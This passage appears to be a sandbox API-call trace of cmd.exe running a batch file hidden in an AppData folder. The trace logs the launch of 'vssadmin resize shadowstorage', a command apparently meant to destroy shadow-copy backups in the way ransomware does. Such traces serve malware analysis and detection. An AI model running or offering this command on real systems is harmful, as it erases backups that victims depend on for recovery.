hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.761] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.761] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.761] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x173c, lpOverlapped=0x0) returned 1 [0035.761] SetFilePointer (in: hFile=0x78, lDistanceToMove=450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2 [0035.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\ned\r\n") returned 61 [0035.761] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.761] GetFileType (hFile=0x78) returned 0x1 [0035.761] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.761] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.761] GetProcessHeap () returned 0x3e0000 [0035.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.762] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f8258 [0035.762] _tell (_FileHandle=3) returned 450 [0035.762] _close (_FileHandle=3) returned 0 [0035.762] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.762] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.762] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.762] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.762] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.762] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.762] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.762] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.762] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.762] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.762] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.762] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.762] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.763] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.763] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.763] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.763] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.763] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.763] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.763] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.763] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.763] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.763] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.763] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.763] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.763] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.763] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.763] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.763] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.763] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.763] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.763] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.763] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.763] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.763] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.763] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.763] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.763] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.763] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.763] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.763] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.763] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.763] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.763] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.763] SetErrorMode (uMode=0x0) returned 0x1 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.764] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.764] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.764] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.764] GetProcessHeap () returned 0x3e0000 [0035.764] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.764] GetLastError () returned 0x2 [0035.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.765] GetLastError () returned 0x2 [0035.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.765] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.765] GetLastError () returned 0x2 [0035.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.765] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.765] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.765] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.765] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.765] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.765] GetProcessHeap () returned 0x3e0000 [0035.765] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f7250 [0035.766] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.766] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.766] SetErrorMode (uMode=0x0) returned 0x1 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.766] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.766] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e0 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7408 [0035.766] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7408, Size=0x122) returned 0x3f7408 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7408) returned 0x122 [0035.766] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7538 [0035.766] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7538, Size=0x76) returned 0x3f7538 [0035.766] GetProcessHeap () returned 0x3e0000 [0035.766] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7538) returned 0x76 [0035.766] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.766] GetLastError () returned 0x2 [0035.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.767] GetLastError () returned 0x2 [0035.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.767] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.767] GetLastError () returned 0x2 [0035.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.767] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.767] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.767] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.767] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.767] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.767] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.768] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.769] GetProcessHeap () returned 0x3e0000 [0035.769] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.769] GetProcessHeap () returned 0x3e0000 [0035.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.769] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.769] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa70, dwThreadId=0xa74)) returned 1 [0035.773] CloseHandle (hObject=0x78) returned 1 [0035.773] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.773] GetProcessHeap () returned 0x3e0000 [0035.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.773] GetEnvironmentStringsW () returned 0x3f8408* [0035.773] GetProcessHeap () returned 0x3e0000 [0035.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.773] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.773] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0035.902] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.902] CloseHandle (hObject=0x74) returned 1 [0035.902] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.902] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.902] GetProcessHeap () returned 0x3e0000 [0035.902] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.902] GetEnvironmentStringsW () returned 0x3f8408* [0035.902] GetProcessHeap () returned 0x3e0000 [0035.902] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.902] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.902] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.902] GetProcessHeap () returned 0x3e0000 [0035.902] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.902] GetEnvironmentStringsW () returned 0x3f8408* [0035.902] GetProcessHeap () returned 0x3e0000 [0035.902] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.902] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.902] GetProcessHeap () returned 0x3e0000 [0035.902] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.902] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.902] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.902] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.902] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.902] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.903] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.903] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.903] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.903] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.903] SetConsoleInputExeNameW () returned 0x1 [0035.903] GetConsoleOutputCP () returned 0x1b5 [0035.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.903] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.904] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0035.904] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.904] SetFilePointer (in: hFile=0x74, lDistanceToMove=450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7538 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7408 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e0 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 